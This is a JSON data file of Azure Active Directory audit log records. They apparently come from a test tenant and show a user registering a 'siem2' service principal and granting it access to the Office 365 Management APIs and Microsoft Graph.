-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "siem2", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"}
